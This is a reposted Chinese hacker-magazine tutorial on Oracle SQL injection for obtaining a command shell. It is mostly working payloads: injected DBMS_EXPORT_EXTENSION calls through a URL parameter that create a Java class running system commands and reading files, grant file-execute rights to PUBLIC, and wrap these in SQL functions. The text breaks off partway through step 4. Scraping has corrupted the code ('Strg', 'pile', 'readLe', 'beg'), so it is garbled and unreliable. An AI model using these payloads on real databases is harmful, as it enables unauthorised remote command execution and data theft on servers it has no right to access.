主页 > 网站建设 >

犀利的 oracle 注入技术

网站建设 2023-02-09 11:06www.1681989.com免费网站

犀利的 oracle 注入技术
  原文发表在黑客手册
  lx 2008.1.12
  介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。
  以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION…..改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION…..)
  的形式即可。(用" 'a'|| "是为了让语句返回true值)
  语句有点长,可能要用post提交。
  以下是各个步骤
  1.创建包
  通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件
  /xxx.jsp?id=1 and '1'<>'a'||(
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace and pile java source named "LxUtil" as import java.io.; public class LxUtil extends Object {public static Strg runCMD(Strg args) {try{BufferedReader myReader= new BufferedReader(
  new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); Strg stemp,str="";while ((stemp = myReader.readLe()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toStrg();}}public static Strg readFile(Strg filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); Strg stemp,str="";while ((stemp = myReader.readLe()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toStrg();}}
  }'''';END;'';END;–','SYS',0,'1',0) from dual
  )
  ————————
  如果url有长度限制,可以把readFile()函数块去掉,即
  /xxx.jsp?id=1 and '1'<>'a'||(
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace and pile java source named "LxUtil" as import java.io.; public class LxUtil extends Object {public static Strg runCMD(Strg args) {try{BufferedReader myReader= new BufferedReader(
  new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); Strg stemp,str="";while ((stemp = myReader.readLe()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toStrg();}}
  }'''';END;'';END;–','SYS',0,'1',0) from dual
  )
  把后面步骤 提到的 对readFile()的处理语句去掉。
  ——————————
  2.赋Java权限
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''beg dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;–','SYS',0,'1',0) from dual
  3.创建函数
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function LxRunCMD(p_cmd varchar2) return varchar2 as language java name ''''''''LxUtil.runCMD(java.lang.Strg) return Strg''''''''; '''';END;'';END;–','SYS',0,'1',0) from dual
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function LxReadFile(filename varchar2) return varchar2 as language java name ''''''''LxUtil.readFile(java.lang.Strg) return Strg''''''''; '''';END;'';END;–','SYS',0,'1',0) from dual
  4.赋public执行函数的权限
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''gran
1

上一篇:秒杀Google浏览器 下一篇:mssql的sa权限执行命令方法总结

网站设计

Copyright © 2016-2025 www.1681989.com 推火网 版权所有 Power by